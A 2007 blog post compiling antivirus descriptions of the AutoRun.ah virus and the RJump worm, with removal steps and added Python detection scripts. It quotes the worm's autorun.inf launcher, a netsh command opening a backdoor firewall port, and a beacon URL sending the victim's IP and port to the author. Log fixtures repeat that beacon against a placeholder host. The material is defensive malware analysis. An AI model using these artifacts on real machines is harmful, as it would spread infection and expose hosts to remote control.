Thursday, December 06, 2007

Autorun.inf Virus.Win32.AutoRun.ah

This file virus is a Windows PE EXE file. It is 380 416 bytes in size and is written in Delphi.

Installation

When launched, the virus copies its executable file as follows:

%System%\config\csrss.exe
%WinDir%\media\arona.exe

It also creates the following file:

%System%\logon.bat

When this batch file is run, it launches the copy of the virus at:

%System%\config\csrss.exe

In order to ensure that the virus is launched automatically when the system is rebooted, it adds a RunOnce entry to the system registry. The entry points at the batch file, which in turn starts the copied executable:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Worms" = "%System%\logon.bat"

The virus also creates the following files:

%System%\config\autorun.inf
h:\autorun.inf
f:\autorun.inf
i:\autorun.inf
g:\autorun.inf
k:\autorun.inf
l:\autorun.inf
o:\autorun.inf
j:\autorun.inf

Windows processes an autorun.inf each time the user opens the corresponding drive in Windows Explorer, so every one of these files launches a copy of the virus: %System%\config\csrss.exe.

Payload

The virus modifies values of the following system registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = 1
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoFolderOptions = 1

It also searches the hard disk partitions listed below for files with an ".mp3" extension:

d:\
c:\
e:\
f:\
g:\
h:\

These files are then deleted.

Removal instructions

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:


  1. Use Task Manager to terminate the virus process.
  2. Delete the original virus file (the location will depend on how
    the program originally penetrated the victim machine).
  3. Delete the following parameters from the system registry (see
    "What is a system registry and how do I use it" for details on how
    to edit the registry):
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    DisableTaskMgr = 1
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    NoFolderOptions = 1
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "Worms" = "%System%\logon.bat"

  4. Delete the following files:
    %System%\config\csrss.exe
    %WinDir%\media\arona.exe
    %System%\logon.bat
    %System%\config\autorun.inf
    h:\autorun.inf
    f:\autorun.inf
    i:\autorun.inf
    g:\autorun.inf
    k:\autorun.inf
    l:\autorun.inf
    o:\autorun.inf
    j:\autorun.inf

  5. Update your antivirus databases and perform a full scan of the
    computer (download a trial version of Kaspersky Anti-Virus).

Or, to find and delete malicious files using the Windows Find or Search utility, follow the instructions for your operating system:

Windows 95/98/Me/NT/2000

Click Start, point to Find or Search, and then click Files or Folders.

Make sure that "Look in" is set to (C:) and that "Include subfolders" is checked.

In the "Named" or "Search for..." box, type, or copy and paste, the file name, autorun.inf.

Click Find Now or Search Now.

Delete any files called autorun.inf that are located in the root folder.



Note: The only 'autorun.inf' that needs to be deleted is located in the
root folder, which is c:\, d:\, and so on. Any 'autorun.inf' files
found in subfolders do not need to be deleted.





Windows XP

Click Start > Search.

Click All files and folders.

In the "All or part of the file name" box, type, or copy and paste, the file name autorun.inf.

Verify that "Look in" is set to "Local Hard Drives" or to (C:).

Click More advanced options.

Check Search system folders.

Check Search subfolders.

Click Search.

Delete any files called autorun.inf that are located in the root folder.



Note: The only 'autorun.inf' that needs to be deleted is located in the
root folder, which is c:\, d:\, and so on. Any 'autorun.inf' files
found in subdirectories do not need to be deleted.


Restart in safe mode and scan with a virus scanner and a spyware scanner (you may need to turn off System Restore first).

Also run regedit and check what is in the Run key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Disable or delete any unknown entries, empty the temp folder and delete old cache files.

Figure out where you got it from, to find better answers...
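Both the Kaspersky removal steps (the registry parameters in step 3) and the note above about checking the Run key come down to looking for specific values in an exported registry hive. The following is an added Python example, not code from either vendor write-up. It parses text in the format produced by "reg export", flags the Policies lockouts and the autostart values named on this page and, as a generalization that is an assumption of this example, any csrss.exe autostarting from a directory other than system32 (the real one lives directly in system32). The export text is constructed; the "Sample" and "ctfmon" entries are not reported on the page and exist only to exercise the checks.

```python
"""Scan text in 'reg export' format for the registry indicators on this page.
Added example, not vendor code; the export below is constructed."""
import re

VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<val>.*)$')

# (key path, value name) -> data reported in the Payload section
POLICY_IOCS = {
    ("hkey_current_user\\software\\microsoft\\windows\\currentversion\\policies\\system",
     "disabletaskmgr"): 1,
    ("hkey_current_user\\software\\microsoft\\windows\\currentversion\\policies\\explorer",
     "nofolderoptions"): 1,
}
AUTOSTART_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")
BAD_VALUE_NAMES = {"worms", "ravav"}                      # value names on this page
BAD_BASENAMES = {"logon.bat", "arona.exe", "ravmon.exe"}  # dropped files on this page


def _unescape(s):
    """Undo the .reg string escaping (doubled backslashes, escaped quotes)."""
    return s.replace("\\\\", "\\").replace('\\"', '"')


def parse_reg(text):
    """Map lowercased key path -> {value name: data}. Handles REG_SZ and REG_DWORD;
    other types are kept as their raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        val = m.group("val")
        if val.startswith("dword:"):
            data = int(val[6:], 16)
        elif len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            data = _unescape(val[1:-1])
        else:
            data = val
        keys[current][_unescape(m.group("name"))] = data
    return keys


def _program(cmd):
    """Program path from a Run-value command line (quoted path or first token)."""
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    tokens = cmd.split()
    return tokens[0] if tokens else cmd


def scan(text):
    """Return human-readable findings for the indicators described on this page."""
    findings = []
    for key, values in parse_reg(text).items():
        for name, data in values.items():
            if POLICY_IOCS.get((key, name.lower())) == data:
                findings.append(f"policy lockout {name}={data} under {key}")
            if not key.endswith(AUTOSTART_SUFFIXES) or not isinstance(data, str):
                continue
            path = _program(data)
            parts = path.replace("/", "\\").lower().split("\\")
            base, parent = parts[-1], (parts[-2] if len(parts) > 1 else "")
            if name.lower() in BAD_VALUE_NAMES or base in BAD_BASENAMES:
                findings.append(f"known-bad autostart {name} -> {path}")
            # Generalised check (assumption of this example): the genuine csrss.exe
            # sits directly in system32, so one autostarting elsewhere is a masquerade.
            elif base == "csrss.exe" and parent != "system32":
                findings.append(f"masquerading csrss.exe autostart {name} -> {path}")
    return findings


# Constructed export; "Sample" and "ctfmon" are illustrative, not from the page.
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Worms"="C:\\WINDOWS\\system32\\logon.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RavAV"="C:\\WINDOWS\\RAVMON.EXE"
"Sample"="C:\\WINDOWS\\system32\\config\\csrss.exe"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

if __name__ == "__main__":
    for finding in scan(REG_EXPORT):
        print(finding)
```

On a live machine the input comes from "reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg" (and the RunOnce and HKCU Policies keys); reg.exe typically writes UTF-16, so open the file with encoding="utf-16" before passing the text to scan().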

W32/RJump.worm



W32/Rjump.worm is a worm written in the Python scripting language and converted into a Windows portable executable file using the Py2Exe tool. It attempts to spread by copying itself to mapped and removable storage drives, and it also opens a backdoor on an infected system.

Aliases

  • Backdoor.Rajump (Symantec)
  • W32/Jisx.A.worm (Panda)
  • W32/RJump-C (Sophos)
  • W32/RJump.A!worm (Fortinet)
  • Win32/RJump.A (ESET)
  • Win32/RJump.A!Worm (CA)
  • Worm.RJump.A (BitDefender)
  • Worm.Win32.RJump.a (Kaspersky)
  • Worm/Rjump.E (Avira)
  • WORM_SIWEOL.B (TrendMicro)

Characteristics


-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

Upon execution, it creates a copy of itself in the Windows directory:

  • %Windir%\RAVMON.EXE

It also creates a non-malicious "RavMonLog" file that contains the port number on which its backdoor component listens.

It adds the following value to the registry so that it starts automatically when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"RavAV" = "%Windir%\RAVMON.EXE"

Symptoms

W32/Rjump.worm creates a port exception for its backdoor component, bypassing the built-in firewall of Windows XP, by executing the following netsh command:

%Windir%\%Sysdir%\cmd.exe /c netsh firewall add portopening TCP 16942 NortonAV

Note: The backdoor port opened is randomly chosen.

It posts the IP address and backdoor port of the infected machine back to the virus author via the following URL:

  • http://natrocket.9966.[Removed]:5288/iesocks?peer_id=%s&port=%s&type=%s&ver=4sD
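The netsh exception and the beacon URL are two observables a defender can correlate: the port that appears in the netsh command is the same port the worm then advertises in its "port=" parameter. The following is an added Python example, not McAfee's or the worm's code. It parses constructed tab-separated process-creation and proxy log lines (the beacon host, peer_id and type values are placeholders, since the page redacts the real host), extracts every "netsh firewall add portopening" and every /iesocks beacon, and raises an alert when a port opened by netsh is later reported to an external host. The list of AV brand names used by suspicious_openings() is a heuristic and an assumption of this example.

```python
"""Correlate netsh firewall exceptions with /iesocks beacons in log lines.
Added example, not vendor code; all log lines below are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

NETSH_RE = re.compile(
    r"netsh\s+firewall\s+add\s+portopening\s+(?P<proto>TCP|UDP)\s+(?P<port>\d+)\s+(?P<name>\S+)",
    re.IGNORECASE,
)
# Heuristic brand list (assumption of this example): the worm names its
# exception "NortonAV" to look like a security product.
AV_BRANDS = ("norton", "symantec", "mcafee", "kaspersky")


def firewall_openings(proc_lines):
    """(port, exception name, initiating image, command line) for each netsh
    portopening in tab-separated 'timestamp<TAB>image<TAB>command line' rows."""
    found = []
    for line in proc_lines:
        _ts, image, cmdline = line.split("\t", 2)
        m = NETSH_RE.search(cmdline)
        if m:
            found.append((int(m.group("port")), m.group("name"), image, cmdline))
    return found


def suspicious_openings(proc_lines):
    """Openings whose exception name borrows an AV brand and that were issued
    through 'cmd.exe /c', the pattern the page reports for the worm."""
    return [
        o for o in firewall_openings(proc_lines)
        if any(b in o[1].lower() for b in AV_BRANDS) and "cmd.exe /c" in o[3].lower()
    ]


def beacons(proxy_lines):
    """(reported port, client, url) for requests carrying the worm's
    peer_id= and port= parameters, from 'timestamp<TAB>client<TAB>method<TAB>url' rows."""
    found = []
    for line in proxy_lines:
        _ts, client, _method, url = line.split("\t")
        q = parse_qs(urlsplit(url).query)
        if "peer_id" in q and q.get("port", [""])[0].isdigit():
            found.append((int(q["port"][0]), client, url))
    return found


def correlate(proc_lines, proxy_lines):
    """Alert when a port opened via netsh is then advertised to an external host."""
    opened = {port: (name, image) for port, name, image, _ in firewall_openings(proc_lines)}
    alerts = []
    for port, client, url in beacons(proxy_lines):
        if port in opened:
            name, image = opened[port]
            alerts.append(
                f"{client}: port {port} opened by {image} (exception '{name}') "
                f"then advertised to {urlsplit(url).netloc}"
            )
    return alerts


# Constructed sample rows. The second process row and the second proxy row
# are benign noise; the 10.0.0.7 beacon has no matching netsh opening.
PROC_LOG = [
    "2006-10-17 09:12:01\tC:\\WINDOWS\\RAVMON.EXE\tcmd.exe /c netsh firewall add portopening TCP 16942 NortonAV",
    "2006-10-17 10:02:17\tC:\\WINDOWS\\system32\\mmc.exe\tnetsh firewall add portopening TCP 3389 RemoteDesktop",
]
PROXY_LOG = [
    "2006-10-17 09:12:03\t10.0.0.5\tGET\thttp://c2.example.invalid:5288/iesocks?peer_id=10.0.0.5&port=16942&type=1&ver=4sD",
    "2006-10-17 09:13:10\t10.0.0.5\tGET\thttp://www.example.com/index.html",
    "2006-10-17 09:14:00\t10.0.0.7\tGET\thttp://c2.example.invalid:5288/iesocks?peer_id=10.0.0.7&port=4000&type=1&ver=4sD",
]

if __name__ == "__main__":
    for alert in correlate(PROC_LOG, PROXY_LOG):
        print(alert)
```

Because the backdoor port is random (see the note below), matching on the port number alone is useless; the value of the example is that the port is observed twice, once in the netsh command and once in the beacon's query string, and only the pairing is distinctive.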

Method of Infection

W32/Rjump.worm lists all mapped and removable storage drives on an infected system and drops the following files into the root folder of each available drive:

  • autorun.inf --> used to autorun the worm when the drive is accessed
  • msvcr71.dll --> Clean Microsoft Visual Studio dll file
  • ravmon.exe --> copy of the worm

The contents of the autorun.inf are as follows:

[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto

Infection occurs when a removable storage device or a mapped drive hosting a copy of W32/Rjump.worm is accessed and the user accepts the AutoRun prompt, which executes the worm.
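The autorun.inf above uses the same mechanism the Virus.Win32.AutoRun.ah description relies on earlier on this page (an autorun.inf dropped in each drive root that Explorer processes when the drive is opened). As an added example that is not part of either vendor write-up, the Python below parses an autorun.inf and reports what Windows would execute on AutoPlay (open= and shellexecute=) and on a double-click in Explorer (a shell= default verb bound to a shell\<verb>\command= entry). Both sample files are constructed; the first reproduces the RJump autorun.inf quoted above and the second is a typical benign install CD with only an icon and a label.

```python
"""Report what an autorun.inf would execute. Added example, not vendor code."""
import re

# Keys whose value Windows executes: open=, shellexecute=, and
# shell\<verb>\command= (which binds a context-menu verb to a command).
CMD_KEY_RE = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")


def parse_autorun(text):
    """Map lowercased key -> value for the [AutoRun] section only."""
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def launched_commands(text):
    """(key, command) pairs AutoRun could execute, in file order."""
    return [(k, v) for k, v in parse_autorun(text).items() if CMD_KEY_RE.match(k)]


def executables(text):
    """Lowercased basenames of the programs those commands start, arguments stripped."""
    names = set()
    for _, cmd in launched_commands(text):
        prog = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split()[0]
        names.add(prog.replace("/", "\\").rsplit("\\", 1)[-1].lower())
    return names


def assess(text):
    """Human-readable findings; an empty list means nothing is auto-executed."""
    entries = parse_autorun(text)
    findings = []
    # shell=<verb> makes that verb the default action, so double-clicking the
    # drive in Explorer runs shell\<verb>\command instead of opening the folder.
    verb = entries.get("shell")
    cmd = entries.get(f"shell\\{verb.lower()}\\command") if verb else None
    if cmd:
        findings.append(f"double-clicking the drive runs: {cmd}")
    for key in ("open", "shellexecute"):
        if key in entries:
            findings.append(f"{key}= runs on AutoPlay: {entries[key]}")
    return findings


# Constructed samples: the RJump file quoted on this page, and a benign CD.
RJUMP_AUTORUN = r"""[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto
"""

CD_AUTORUN = r"""[autorun]
icon=setup.exe,0
label=Product Installer
"""

if __name__ == "__main__":
    for label, sample in (("rjump", RJUMP_AUTORUN), ("cd", CD_AUTORUN)):
        print(label, executables(sample), assess(sample))
```

The "shell=Auto" line is the part worth noticing: even with AutoPlay declined, the "Auto" verb becomes Explorer's default action for the drive, which is why the earlier write-up says the virus runs "each time the user opens the corresponding hard disk partition using Windows Explorer".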

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Stinger:

A Stinger Standalone removal tool has been released to assist in repairing this threat.

Variants


    N/A
